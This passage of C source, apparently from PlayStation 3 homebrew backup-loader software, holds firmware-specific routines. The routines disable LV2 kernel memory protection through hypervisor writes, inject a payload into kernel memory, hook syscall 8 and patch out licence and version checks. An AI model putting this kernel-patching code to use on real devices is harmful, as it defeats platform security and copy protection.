        pokeq(0x8000000000055C5CULL + 0x08, 0xFBC10160FBE10168ULL);
        pokeq(0x8000000000055C5CULL + 0x10, 0xFB610148FB810150ULL);
        pokeq(0x8000000000055C5CULL + 0x18, 0xFBA10158F8010180ULL);

        //patch to prevent blackscreen on usb games in jb format
        pokeq(0x8000000000055C84ULL, 0x386000002F830001ULL); //Original: 0x481DA6692F830001ULL
        pokeq(0x8000000000055C8CULL, 0x419E00303BA00000ULL); //Original: 0x419E00303BA00000ULL
    }
    else if(bEnableLv2_habib_patch == 10)
    {
        // disable new habib patches
        pokeq(0x8000000000058DB0ULL + 0x00, 0x419E0038E8610098ULL);
        pokeq(0x8000000000058DB0ULL + 0x08, 0x2FA30000419E000CULL);
        pokeq(0x8000000000058DB0ULL + 0x10, 0x388000334800BE15ULL);
        pokeq(0x8000000000058DB0ULL + 0x18, 0xE80100F07FE307B4ULL);
        pokeq(0x8000000000055C5CULL + 0x00, 0xF821FE917C0802A6ULL);
        pokeq(0x8000000000055C5CULL + 0x08, 0xFBC10160FBE10168ULL);
        pokeq(0x8000000000055C5CULL + 0x10, 0xFB610148FB810150ULL);
        pokeq(0x8000000000055C5CULL + 0x18, 0xFBA10158F8010180ULL);
    }
    else
    {
        if(bEnableLv2_habib_patch >= 1)
        {
            if(bEnableLv2_habib_patch == 3)
                pokeq32(0x8000000000058DB0ULL, 0x60000000); // old fix 0x80010017 error Original: 0x7C7F1B78419E0038ULL
            else
                pokeq(0x80000000002A1060ULL, 0x386000014E800020ULL); // fix 0x80010017 error Original: 0xFBC1FFF0EBC225B0ULL

            // Booting of game discs and backups speed increased
            if(bEnableLv2_habib_patch != 4)
            {
                pokeq32(0x8000000000058DA4ULL, 0x38600001);
                pokeq32(0x800000000005A970ULL, 0x38600000);
            }

            pokeq(0x8000000000055C5CULL, 0x386000004E800020ULL); // fix 0x8001002B error Original: 0xF821FE917C0802A6ULL
        }
    }

    /* BASIC PATCHES SYS36 */
    // by 2 anonymous people
    _poke32(0x56600, 0x60000000); // Original: 0x419E00D8419D00C0ULL -> 0x419E00D860000000ULL
    PATCH_JUMP(0x56608, 0x566A0); // Original: 0x2F840004409C0048ULL -> 0x2F84000448000098ULL
    _poke32(0x05A65C, 0x60000000); // fix 80010009 error
    _poke32(0x05A670, 0x60000000); // fix 80010019 error
    _poke( 0x05658C, 0x63FF003D60000000); // fix 8001003D error "ori %r31, %r31, 0x3D\n nop\n" done
    _poke32(0x056654, 0x3BE00000); // fix 8001003E error -- 3.55 ok in 0x055F64 "li %r31, 0" done
    PATCH_JUMP(0x56658, 0x56564); // Not present in rebug, anyway..
    _poke(0x26FDE0, 0x386000007C6307B4); //fix 8001003C error
    _poke32(0x26FDE0 + 8, 0x4E800020); //

    /*
     * -002c3cf0 f8 01 00 b0 7c 9c 23 78 7c 7d 1b 78 4b d8 aa 1d |....|.#x|}.xK...|
     * +002c3cf0 f8 01 00 b0 7c 9c 23 78 4b d4 01 88 4b d8 aa 1d |....|.#xK...K...|
     * (openhook jump - 0x3E80)
     */
    PATCH_JUMP(0x2A02EC, (PAYLOAD_OFFSET+0x30)); // patch openhook - done
    _poke32(0x2A02C8, 0xF821FF61); // free openhook Rogero 4.30 (put "stdu %sp, -0xA0(%sp)" instead "b sub_2E9F98")

#ifdef CONFIG_USE_SYS8PERMH4
    PATCH_JUMP(PERMS_OFFSET, (PAYLOAD_OFFSET+0x18));
#endif
}
/*
 * load_payload_421dex -- install the 4.21 DEX "sky" payload into LV2 memory.
 *
 * Unconditionally disables LV2 memory protection through four LV1 writes
 * (per the author's comment), then runs the common sequence: copy payload +
 * umount routine, save the syscall-8 slot in restore_syscall8[], write the
 * "SK1E" id at 0x4f0, copy the kernel TOC into the payload, point syscall 8
 * at it, and apply the 4.21 DEX instruction patches.
 *
 * NOTE(review): addresses are bound to the 4.21 DEX LV2 image; nothing here
 * checks the running version. `mode` is not used in this body.
 */
void load_payload_421dex(int mode) {
    // Remove lv2 protection
    lv1poke(0x370A28, 0x0000000000000001ULL);
    lv1poke(0x370A30, 0xe0d251b556c59f05ULL);
    lv1poke(0x370A38, 0xc232fcad552c80d7ULL);
    lv1poke(0x370A40, 0x65140cd200000000ULL);

    install_lv2_memcpy();

    /* WARNING!! It supports only payload with a size multiple of 8 */
    lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_OFFSET, (u64) payload_sky_421dex_bin, payload_sky_421dex_bin_size);

    lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_UMOUNT_OFFSET, // copy umount routine
               (u64) umount_421dex_bin, umount_421dex_bin_size);

    // remember the original syscall 8 slot (address and content)
    restore_syscall8[0]= SYSCALL_BASE + 64ULL; // (8*8)
    restore_syscall8[1]= peekq(restore_syscall8[0]);

    u64 id[2];
    // copy the id
    id[0]= 0x534B314500000000ULL | (u64) PAYLOAD_OFFSET;
    id[1] = SYSCALL_BASE + 64ULL; // (8*8)
    lv2_memcpy(0x80000000000004f0ULL, (u64) &id[0], 16);

    u64 inst8 = peekq(0x8000000000003000ULL); // get TOC
    lv2_memcpy(0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x28), (u64) &inst8, 8);

    inst8 = 0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x20); // syscall_8_desc - sys8
    lv2_memcpy(SYSCALL_BASE + (u64) (8 * 8), (u64) &inst8, 8);

    usleep(1000);

    remove_lv2_memcpy();

    pokeq(0x80000000007EF000ULL, 0ULL); // BE Emu mount
    pokeq(0x80000000007EF220ULL, 0ULL);

    /* BASIC PATCHES SYS36 */
    // by 2 anonymous people
    _poke32(0x05A9AC, 0x60000000); // already set in ps3ita "nop"
    PATCH_JUMP(0x05A9B4, 0x5AA4C); // already set in ps3ita "nop"
    _poke32(0x05E370, 0x60000000); // already set in ps3ita "nop"
    _poke32(0x05E384, 0x60000000); // already set in ps3ita "nop"
    _poke( 0x05A938, 0x63FF003D60000000); // already set in ps3ita - fix 8001003D error "ori %r31, %r31, 0x3D\n nop\n"
    _poke32(0x05AA00, 0x3BE00000); // already set in ps3ita - fix 8001003E error -- 3.55 ok in 0x055F64 "li %r31, 0"
    PATCH_JUMP(0x05AA04, 0x5A910); // already set in ps3ita

    /** Rancid-o: Fix 0x8001003C error (incorrect version in sys_load_param) - It is present in the new game updates **/
    _poke(0x29C8C4, 0x386000007C6307B4);
    _poke32(0x29C8CC, 0x4E800020);

    /*
     * -002c3cf0 f8 01 00 b0 7c 9c 23 78 7c 7d 1b 78 4b d8 aa 1d |....|.#x|}.xK...|
     * +002c3cf0 f8 01 00 b0 7c 9c 23 78 4b d4 01 88 4b d8 aa 1d |....|.#xK...K...|
     * (openhook jump - 0x3E80)
     */
    PATCH_JUMP(0x2D973C, (PAYLOAD_OFFSET+0x30));

#ifdef CONFIG_USE_SYS8PERMH4
    PATCH_JUMP(PERMS_OFFSET, (PAYLOAD_OFFSET+0x18));
#endif
}
/*
 * load_payload_453dex -- install the 4.53 DEX "sky" payload into LV2 memory.
 *
 * The LV1 memory-protection writes are left commented out (the author notes
 * they are not needed on REBUG 4.53.1). The syscall slot is computed from
 * SYSCALL_SK1E rather than the literal 64 used by some sibling routines.
 * Otherwise the common sequence applies: copy payload + umount routine, save
 * the syscall slot in restore_syscall8[], write the "SK1E" id at 0x4f0, copy
 * the kernel TOC into the payload, point the syscall at it, apply the 4.53
 * DEX instruction patches.
 *
 * NOTE(review): addresses are bound to the 4.53 DEX LV2 image; nothing here
 * checks the running version. `mode` is not used in this body.
 */
void load_payload_453dex(int mode) {
    //Remove Lv2 memory protection
    //No needed on REBUG 4.53.1
    /*
    {
        lv1poke(0x385130, 0x0000000000000001ULL);
        lv1poke(0x385130 + 8, 0xE0D251B556C59F05ULL);
        lv1poke(0x385130 + 16, 0xC232FCAD552C80D7ULL);
        lv1poke(0x385130 + 24, 0x65140CD200000000ULL);
    }
    */

    install_lv2_memcpy();

    /* WARNING!! It supports only payload with a size multiple of 8 */
    lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_OFFSET, (u64) payload_sky_453dex_bin, payload_sky_453dex_bin_size);

    lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_UMOUNT_OFFSET, // copy umount routine
               (u64) umount_453dex_bin, umount_453dex_bin_size);

    // remember the original syscall slot (address and content)
    restore_syscall8[0]= SYSCALL_BASE + (u64) (SYSCALL_SK1E * 8ULL); // (8*8)
    restore_syscall8[1]= peekq(restore_syscall8[0]);

    u64 id[2];
    // copy the id
    id[0]= 0x534B314500000000ULL | (u64) PAYLOAD_OFFSET;
    id[1] = SYSCALL_BASE + (u64) (SYSCALL_SK1E * 8ULL); // (8*8)
    lv2_memcpy(0x80000000000004f0ULL, (u64) &id[0], 16);

    u64 inst8 = peekq(0x8000000000003000ULL); // get TOC
    lv2_memcpy(0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x28), (u64) &inst8, 8);

    inst8 = 0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x20); // syscall_8_desc - sys8
    lv2_memcpy(SYSCALL_BASE + (u64) (SYSCALL_SK1E * 8ULL), (u64) &inst8, 8);

    usleep(1000);

    remove_lv2_memcpy();

    pokeq(0x80000000007EF000ULL, 0ULL);// BE Emu mount
    pokeq(0x80000000007EF220ULL, 0ULL);

    /* BASIC PATCHES SYS36 */
    // by 2 anonymous people
    _poke32(0x59B04, 0x60000000); // done
    PATCH_JUMP(0x59B0C, 0x59BA4); // done
    _poke32(0x5D4C8, 0x60000000); // done
    _poke32(0x5D4DC, 0x60000000); // done
    _poke( 0x59A90, 0x63FF003D60000000); // fix 8001003D error "ori %r31, %r31, 0x3D\n nop\n" done
    _poke32(0x59B58, 0x3BE00000); // fix 8001003E error -- 3.55 ok in 0x055F64 "li %r31, 0" done

    /** Rancid-o: Fix 0x8001003C error (incorrect version in sys_load_param) - It is present in the new game updates **/
    _poke(0x275F10, 0x386000007C6307B4); // is still patched in rebug, anyway..
    _poke32(0x275F10 + 8, 0x4E800020);

    /*
     * -002c3cf0 f8 01 00 b0 7c 9c 23 78 7c 7d 1b 78 4b d8 aa 1d |....|.#x|}.xK...|
     * +002c3cf0 f8 01 00 b0 7c 9c 23 78 4b d4 01 88 4b d8 aa 1d |....|.#xK...K...|
     * (openhook jump - 0x3E80)
     */
    PATCH_JUMP(0x2B83E4, (PAYLOAD_OFFSET+0x30)); // patch openhook

#ifdef CONFIG_USE_SYS8PERMH4
    PATCH_JUMP(PERMS_OFFSET, (PAYLOAD_OFFSET+0x18));
#endif
}
/*
 * load_payload_450dex -- install the 4.50 DEX "sky" payload into LV2 memory.
 *
 * The LV1 memory-protection writes are skipped when /dev_flash/ps3ita exists
 * (the author notes that CFW has no LV2 memory protection). Then the common
 * sequence: copy payload + umount routine, save the syscall-8 slot in
 * restore_syscall8[], write the "SK1E" id at 0x4f0, copy the kernel TOC into
 * the payload, point syscall 8 at it, apply the webMAN and SYS36 patches.
 *
 * NOTE(review): the webMAN block and the SYS36 block write overlapping
 * addresses (e.g. 0x59A8C, 0x275D38/0x275D3C); the later write wins.
 * Addresses are bound to the 4.50 DEX LV2 image; nothing here checks the
 * running version. `mode` is not used in this body.
 */
void load_payload_450dex(int mode) {
    //Remove Lv2 memory protection
    if( file_exists("/dev_flash/ps3ita") == 0 ) // is not necessary on cfw ps3ita it don't has lv2 memory protection
    {
        lv1poke(0x370AA8, 0x0000000000000001ULL);
        lv1poke(0x370AA8 + 8, 0xE0D251B556C59F05ULL);
        lv1poke(0x370AA8 + 16, 0xC232FCAD552C80D7ULL);
        lv1poke(0x370AA8 + 24, 0x65140CD200000000ULL);
    }

    install_lv2_memcpy();

    /* WARNING!! It supports only payload with a size multiple of 8 */
    lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_OFFSET, (u64) payload_sky_450dex_bin, payload_sky_450dex_bin_size);

    lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_UMOUNT_OFFSET, // copy umount routine
               (u64) umount_450dex_bin, umount_450dex_bin_size);

    // remember the original syscall 8 slot (address and content)
    restore_syscall8[0]= SYSCALL_BASE + 64ULL; // (8*8)
    restore_syscall8[1]= peekq(restore_syscall8[0]);

    u64 id[2];
    // copy the id
    id[0]= 0x534B314500000000ULL | (u64) PAYLOAD_OFFSET;
    id[1] = SYSCALL_BASE + 64ULL; // (8*8)
    lv2_memcpy(0x80000000000004f0ULL, (u64) &id[0], 16);

    u64 inst8 = peekq(0x8000000000003000ULL); // get TOC
    lv2_memcpy(0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x28), (u64) &inst8, 8);

    inst8 = 0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x20); // syscall_8_desc - sys8
    lv2_memcpy(SYSCALL_BASE + (u64) (8 * 8), (u64) &inst8, 8);

    usleep(1000);

    remove_lv2_memcpy();

    pokeq(0x80000000007EF000ULL, 0ULL);// BE Emu mount
    pokeq(0x80000000007EF220ULL, 0ULL);

    //Patches from webMAN
    pokeq(0x8000000000275D38ULL, 0x4E80002038600000ULL ); // fix 8001003C error
    pokeq(0x8000000000275D40ULL, 0x7C6307B44E800020ULL ); // fix 8001003C error
    pokeq(0x8000000000059A8CULL, 0x63FF003D60000000ULL ); // fix 8001003D error
    pokeq(0x8000000000059B50ULL, 0x3FE080013BE00000ULL ); // fix 8001003E error
    pokeq(0x8000000000059AFCULL, 0x419E00D860000000ULL );
    pokeq(0x8000000000059B04ULL, 0x2F84000448000098ULL );
    pokeq(0x800000000005D4C0ULL, 0x2F83000060000000ULL );
    pokeq(0x800000000005D4D4ULL, 0x2F83000060000000ULL );

    /* BASIC PATCHES SYS36 */
    // by 2 anonymous people
    _poke32(0x59B00, 0x60000000); // done
    PATCH_JUMP(0x59B08, 0x59BA0); // done
    _poke32(0x5D4C4, 0x60000000); // done
    _poke32(0x5D4D8, 0x60000000); // done
    _poke( 0x59A8C, 0x63FF003D60000000); // fix 8001003D error "ori %r31, %r31, 0x3D\n nop\n" done
    _poke32(0x59B54, 0x3BE00000); // fix 8001003E error -- 3.55 ok in 0x055F64 "li %r31, 0" done
    // PATCH_JUMP(0x, 0x56098);

    /** Rancid-o: Fix 0x8001003C error (incorrect version in sys_load_param) - It is present in the new game updates **/
    _poke(0x275D3C, 0x386000007C6307B4); // is still patched in rebug, anyway..
    _poke32(0x275D3C + 8, 0x4E800020);

    /*
     * -002c3cf0 f8 01 00 b0 7c 9c 23 78 7c 7d 1b 78 4b d8 aa 1d |....|.#x|}.xK...|
     * +002c3cf0 f8 01 00 b0 7c 9c 23 78 4b d4 01 88 4b d8 aa 1d |....|.#xK...K...|
     * (openhook jump - 0x3E80)
     */
    PATCH_JUMP(0x2B820C, (PAYLOAD_OFFSET+0x30)); // patch openhook

#ifdef CONFIG_USE_SYS8PERMH4
    PATCH_JUMP(PERMS_OFFSET, (PAYLOAD_OFFSET+0x18));
#endif
}
/*
 * load_payload_480 -- install the 4.80 "sky" payload into LV2 kernel memory.
 *
 * Unconditionally performs the four LV1 writes that (per the author's comment)
 * disable LV2 memory protection, even though the same comment says they are
 * not needed on REBUG 4.7x. The syscall slot is computed from SYSCALL_SK1E.
 * Most of the deank/webMAN patch set is kept only as commented-out reference
 * (the author states the SYS36 block below does the same thing); only the
 * 8001003C, LIC.DAT and 8001002B/80010017 pokeq writes remain active.
 *
 * NOTE(review): addresses are bound to the 4.80 LV2 image; nothing here checks
 * the running version. `mode` is not used in this body.
 */
void load_payload_480(int mode) {
    //Remove Lv2 memory protection, NOT needed for REBUG 4.7x
    // "Original:" values are the pre-patch contents of the four LV1 words
    lv1poke(0x370F28 + 0x00, 0x0000000000000001ULL); // Original: 0x0000000000351FD8ULL
    lv1poke(0x370F28 + 0x08, 0xE0D251B556C59F05ULL); // Original: 0x3B5B965B020AE21AULL
    lv1poke(0x370F28 + 0x10, 0xC232FCAD552C80D7ULL); // Original: 0x7D6F60B118E2E81BULL
    lv1poke(0x370F28 + 0x18, 0x65140CD200000000ULL); // Original: 0x315D8B7700000000ULL

    install_lv2_memcpy();

    /* WARNING!! It supports only payload with a size multiple of 8 */
    lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_OFFSET, (u64) payload_sky_480_bin, payload_sky_480_bin_size);

    lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_UMOUNT_OFFSET, // copy umount routine
               (u64) umount_480_bin, umount_480_bin_size);

    // remember the original syscall slot (address and content)
    restore_syscall8[0]= SYSCALL_BASE + (u64) (SYSCALL_SK1E * 8ULL); // (8*8)
    restore_syscall8[1]= peekq(restore_syscall8[0]);

    u64 id[2];
    // copy the id
    id[0]= 0x534B314500000000ULL | (u64) PAYLOAD_OFFSET;
    id[1] = SYSCALL_BASE + (u64) (SYSCALL_SK1E * 8ULL); // (8*8)
    lv2_memcpy(0x80000000000004f0ULL, (u64) &id[0], 16);

    u64 inst8 = peekq(0x8000000000003000ULL); // get TOC
    lv2_memcpy(0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x28), (u64) &inst8, 8);

    inst8 = 0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x20); // syscall_8_desc - sys8
    lv2_memcpy(SYSCALL_BASE + (u64) (SYSCALL_SK1E * 8ULL), (u64) &inst8, 8);

    usleep(1000);

    remove_lv2_memcpy();

    pokeq(0x80000000007EF000ULL, 0ULL);// BD Emu mount
    pokeq(0x80000000007EF220ULL, 0ULL);

    //patches by deank for webMAN, I left them here just in case someone wants to play with, but basically the same thing with SYS36 patches below
    pokeq(0x8000000000267144ULL, 0x4E80002038600000ULL ); // fix 8001003C error Original: 0x4E8000208003026CULL
    pokeq(0x800000000026714CULL, 0x7C6307B44E800020ULL ); // fix 8001003C error Original: 0x3D201B433C608001ULL
    /*
    pokeq(0x800000000005688CULL, 0x63FF003D60000000ULL ); // fix 8001003D error Original: 0x63FF003D419EFFD4ULL
    pokeq(0x800000000005664CULL, 0x3FE080013BE00000ULL ); // fix 8001003E error Original: 0x3FE0800163FF003EULL
    pokeq(0x80000000000565F8ULL, 0x419E00D860000000ULL ); // Original: 0x419E00D8419D00C0ULL
    pokeq(0x8000000000056600ULL, 0x2F84000448000098ULL ); // Original: 0x2F840004409C0048ULL //PATCH_JUMP
    pokeq(0x800000000005A6DCULL, 0x2F83000060000000ULL ); // fix 80010009 error Original: 0x2F830000419E00ACULL
    pokeq(0x800000000005A6F0ULL, 0x2F83000060000000ULL ); // fix 80010009 error Original: 0x2F830000419E00ACULL
    */
    pokeq(0x800000000005622CULL, 0x386000012F830000ULL ); // ignore LIC.DAT check
    pokeq(0x80000000002275ECULL, 0x38600000F8690000ULL ); // fix 0x8001002B / 80010017 errors
    //pokeq(0x8000000000055C58ULL, 0xF821FE917C0802A6ULL ); // just restore the original
    //pokeq(0x8000000000058E18ULL, 0x419E0038E8610098ULL ); // just restore the original

    /* BASIC PATCHES SYS36 */
    // by 2 anonymous people
    _poke32(0x565FC, 0x60000000); //
    PATCH_JUMP(0x56604, 0x5669C); //
    _poke32(0x5A6E0, 0x60000000); // fix 80010009 error
    _poke32(0x5A6F4, 0x60000000); // fix 80010019 error
    _poke( 0x56588, 0x63FF003D60000000); // fix 8001003D error "ori %r31, %r31, 0x3D\n nop\n" done
    _poke32(0x56650, 0x3BE00000); // fix 8001003E error -- 3.55 ok in 0x055F64 "li %r31, 0" done

    //Fix 0x8001003C error (incorrect version in sys_load_param) - It is present in the new game updates **/
    //_poke(0x267148, 0x386000007C6307B4); //
    //_poke32(0x267148 + 0x8, 0x4E800020); //

    /*
     * -002c3cf0 f8 01 00 b0 7c 9c 23 78 7c 7d 1b 78 4b d8 aa 1d |....|.#x|}.xK...|
     * +002c3cf0 f8 01 00 b0 7c 9c 23 78 4b d4 01 88 4b d8 aa 1d |....|.#xK...K...|
     * (openhook jump - 0x3E80)
     */
    PATCH_JUMP(0x297650, (PAYLOAD_OFFSET+0x30)); // patch openhook - done
    //_poke32(0x29762C, 0xF821FF61); // free openhook Rogero 4.30 (put "stdu %sp, -0xA0(%sp)" instead "b sub_2E9F98")

#ifdef CONFIG_USE_SYS8PERMH4
    PATCH_JUMP(PERMS_OFFSET, (PAYLOAD_OFFSET+0x18));
#endif
}
/*
 * load_payload_446 -- install the 4.46 "sky" payload into LV2 kernel memory.
 *
 * Unconditionally performs the four LV1 writes that (per the author's
 * comment) disable LV2 memory protection, then the common sequence: copy
 * payload + umount routine, save the syscall slot (from SYSCALL_SK1E) in
 * restore_syscall8[], write the "SK1E" id at 0x4f0, copy the kernel TOC into
 * the payload, point the syscall at it, apply the webMAN and SYS36 patches.
 *
 * NOTE(review): the webMAN block and the SYS36 block write overlapping
 * addresses (e.g. 0x560C0, 0x297310/0x297314); the later write wins.
 * Addresses are bound to the 4.46 LV2 image; nothing here checks the running
 * version. `mode` is not used in this body.
 */
void load_payload_446(int mode) {
    //Remove Lv2 memory protection
    lv1poke(0x370AA8 , 0x0000000000000001ULL);
    lv1poke(0x370AA8 + 8 , 0xE0D251B556C59F05ULL);
    lv1poke(0x370AA8 + 16, 0xC232FCAD552C80D7ULL);
    lv1poke(0x370AA8 + 24, 0x65140CD200000000ULL);

    install_lv2_memcpy();

    /* WARNING!! It supports only payload with a size multiple of 8 */
    lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_OFFSET, (u64) payload_sky_446_bin, payload_sky_446_bin_size);

    lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_UMOUNT_OFFSET, // copy umount routine
               (u64) umount_446_bin, umount_446_bin_size);

    // remember the original syscall slot (address and content)
    restore_syscall8[0]= SYSCALL_BASE + (u64) (SYSCALL_SK1E * 8ULL); // (8*8)
    restore_syscall8[1]= peekq(restore_syscall8[0]);

    u64 id[2];
    // copy the id
    id[0]= 0x534B314500000000ULL | (u64) PAYLOAD_OFFSET;
    id[1] = SYSCALL_BASE + (u64) (SYSCALL_SK1E * 8ULL); // (8*8)
    lv2_memcpy(0x80000000000004f0ULL, (u64) &id[0], 16);

    u64 inst8 = peekq(0x8000000000003000ULL); // get TOC
    lv2_memcpy(0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x28), (u64) &inst8, 8);

    inst8 = 0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x20); // syscall_8_desc - sys8
    lv2_memcpy(SYSCALL_BASE + (u64) (SYSCALL_SK1E * 8ULL), (u64) &inst8, 8);

    usleep(1000);

    remove_lv2_memcpy();

    pokeq(0x80000000007EF000ULL, 0ULL);// BE Emu mount
    pokeq(0x80000000007EF220ULL, 0ULL);

    //Patches from webMAN
    pokeq(0x8000000000297310ULL, 0x4E80002038600000ULL ); // fix 8001003C error
    pokeq(0x8000000000297318ULL, 0x7C6307B44E800020ULL ); // fix 8001003C error
    pokeq(0x80000000000560C0ULL, 0x63FF003D60000000ULL ); // fix 8001003D error
    pokeq(0x8000000000056184ULL, 0x3FE080013BE00000ULL ); // fix 8001003E error
    pokeq(0x8000000000056130ULL, 0x419E00D860000000ULL );
    pokeq(0x8000000000056138ULL, 0x2F84000448000098ULL );
    pokeq(0x8000000000059AF4ULL, 0x2F83000060000000ULL );
    pokeq(0x8000000000059B08ULL, 0x2F83000060000000ULL );

    /* BASIC PATCHES SYS36 */
    // by 2 anonymous people
    _poke32(0x56134, 0x60000000); // done
    PATCH_JUMP(0x5613C, 0x561D4); // done
    _poke32(0x059AF8, 0x60000000); // done
    _poke32(0x059B0C, 0x60000000); // done
    _poke( 0x0560C0, 0x63FF003D60000000); // fix 8001003D error "ori %r31, %r31, 0x3D\n nop\n" done
    _poke32(0x056188, 0x3BE00000); // fix 8001003E error -- 3.55 ok in 0x055F64 "li %r31, 0" done
    PATCH_JUMP(0x5618C, 0x56098); // Not present in rebug, anyway..

    /** Rancid-o: Fix 0x8001003C error (incorrect version in sys_load_param) - It is present in the new game updates **/
    _poke(0x297314, 0x386000007C6307B4); //done
    _poke32(0x297314 + 8, 0x4E800020); //done

    /*
     * -002c3cf0 f8 01 00 b0 7c 9c 23 78 7c 7d 1b 78 4b d8 aa 1d |....|.#x|}.xK...|
     * +002c3cf0 f8 01 00 b0 7c 9c 23 78 4b d4 01 88 4b d8 aa 1d |....|.#xK...K...|
     * (openhook jump - 0x3E80)
     */
    PATCH_JUMP(0x2C47D4, (PAYLOAD_OFFSET+0x30)); // patch openhook - done
    _poke32(0x2C47B0, 0xF821FF61); // free openhook Rogero 4.30 (put "stdu %sp, -0xA0(%sp)" instead "b sub_2E9F98")
    _poke(0x2C47B8, 0xFB810080FBA10088ULL); // skip stupid new Rogero patch for ToolBox }:/ (must I restore all LV2 patches to skip this shit?)

#ifdef CONFIG_USE_SYS8PERMH4
    PATCH_JUMP(PERMS_OFFSET, (PAYLOAD_OFFSET+0x18));
#endif
}
/*
 * load_payload_460 -- install the 4.60 "sky" payload into LV2 kernel memory.
 *
 * The LV1 memory-protection writes are left commented out. Then the common
 * sequence: copy payload + umount routine, save the syscall-8 slot in
 * restore_syscall8[], write the "SK1E" id at 0x4f0, copy the kernel TOC into
 * the payload, point syscall 8 at it, and apply the 4.60 SYS36 patches.
 *
 * NOTE(review): addresses are bound to the 4.60 LV2 image; nothing here
 * checks the running version. `mode` is not used in this body.
 */
void load_payload_460(int mode) {
    //Remove Lv2 memory protection
    /*
    lv1poke(0x370F28, 0x0000000000000001ULL);
    lv1poke(0x370F28 + 8, 0xE0D251B556C59F05ULL);
    lv1poke(0x370F28 + 16, 0xC232FCAD552C80D7ULL);
    lv1poke(0x370F28 + 24, 0x65140CD200000000ULL);
    */

    install_lv2_memcpy();

    /* WARNING!! It supports only payload with a size multiple of 8 */
    lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_OFFSET, (u64) payload_sky_460_bin, payload_sky_460_bin_size);

    lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_UMOUNT_OFFSET, // copy umount routine
               (u64) umount_460_bin, umount_460_bin_size);

    // remember the original syscall 8 slot (address and content)
    restore_syscall8[0]= SYSCALL_BASE + 64ULL; // (8*8)
    restore_syscall8[1]= peekq(restore_syscall8[0]);

    u64 id[2];
    // copy the id
    id[0]= 0x534B314500000000ULL | (u64) PAYLOAD_OFFSET;
    id[1] = SYSCALL_BASE + 64ULL; // (8*8)
    lv2_memcpy(0x80000000000004f0ULL, (u64) &id[0], 16);

    u64 inst8 = peekq(0x8000000000003000ULL); // get TOC
    lv2_memcpy(0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x28), (u64) &inst8, 8);

    inst8 = 0x8000000000000000ULL + (u64) (PAYLOAD_OFFSET + 0x20); // syscall_8_desc - sys8
    lv2_memcpy(SYSCALL_BASE + (u64) (8 * 8), (u64) &inst8, 8);

    usleep(1000);

    remove_lv2_memcpy();

    pokeq(0x80000000007EF000ULL, 0ULL);// BE Emu mount
    pokeq(0x80000000007EF220ULL, 0ULL);

    /* BASIC PATCHES SYS36 */
    // by 2 anonymous people
    _poke32(0x565FC, 0x60000000); // done
    PATCH_JUMP(0x56604, 0x5669C); // done
    _poke32(0x05A658, 0x60000000); // done
    _poke32(0x05A66C, 0x60000000); // done
    _poke( 0x056588, 0x63FF003D60000000); // fix 8001003D error "ori %r31, %r31, 0x3D\n nop\n" done
    _poke32(0x056650, 0x3BE00000); // fix 8001003E error -- 3.55 ok in 0x055F64 "li %r31, 0" done
    PATCH_JUMP(0x56654, 0x56560); // Not present in rebug, anyway..
    _poke(0x26FDD8, 0x386000007C6307B4); //done
    _poke32(0x26FDD8 + 8, 0x4E800020); //done

    /*
     * -002c3cf0 f8 01 00 b0 7c 9c 23 78 7c 7d 1b 78 4b d8 aa 1d |....|.#x|}.xK...|
     * +002c3cf0 f8 01 00 b0 7c 9c 23 78 4b d4 01 88 4b d8 aa 1d |....|.#xK...K...|
     * (openhook jump - 0x3E80)
     */
    PATCH_JUMP(0x2A02E0, (PAYLOAD_OFFSET+0x30)); // patch openhook - done
    _poke32(0x2A02BC, 0xF821FF61); // free openhook Rogero 4.30 (put "stdu %sp, -0xA0(%sp)" instead "b sub_2E9F98")

#ifdef CONFIG_USE_SYS8PERMH4
    PATCH_JUMP(PERMS_OFFSET, (PAYLOAD_OFFSET+0x18));
#endif
}
/*
 * load_payload_421 -- install the 4.21 "sky" payload into LV2 kernel memory.
 *
 * Unconditionally performs four LV1 writes (via lv1_pokeq here, not lv1poke
 * as in the sibling routines) that per the author's comment disable LV2
 * memory protection, then the common sequence: copy payload + umount
 * routine, save the syscall slot (from SYSCALL_SK1E) in restore_syscall8[],
 * write the "SK1E" id at 0x4f0, copy the kernel TOC into the payload, point
 * the syscall at it, apply the webMAN and SYS36 patches.
 *
 * NOTE(review): the webMAN block and the SYS36 block write overlapping
 * addresses (e.g. 0x57020, 0x296264/0x296268); the later write wins.
 * Addresses are bound to the 4.21 LV2 image; nothing here checks the running
 * version. `mode` is not used in this body.
 */
void load_payload_421(int mode) {
    // Remove LV2 memory protection using LV1_POKE (syscall 9). Maybe unnecessary
    lv1_pokeq(0x370A28, 0x0000000000000001ULL);
    lv1_pokeq(0x370A30, 0xe0d251b556c59f05ULL);
    lv1_pokeq(0x370A38, 0xc232fcad552c80d7ULL);
    lv1_pokeq(0x370A40, 0x65140cd200000000ULL);

    install_lv2_memcpy();

    /* WARNING!! It supports only payload with a size multiple of 8 */
    lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_OFFSET, (u64) payload_sky_421_bin, payload_sky_421_bin_size);

    lv2_memcpy(0x8000000000000000ULL + (u64) PAYLOAD_UMOUNT_OFFSET, // copy umount routine
               (u64) umount_421_bin, umount_421_bin_size);

    // remember the original syscall slot (address and content)
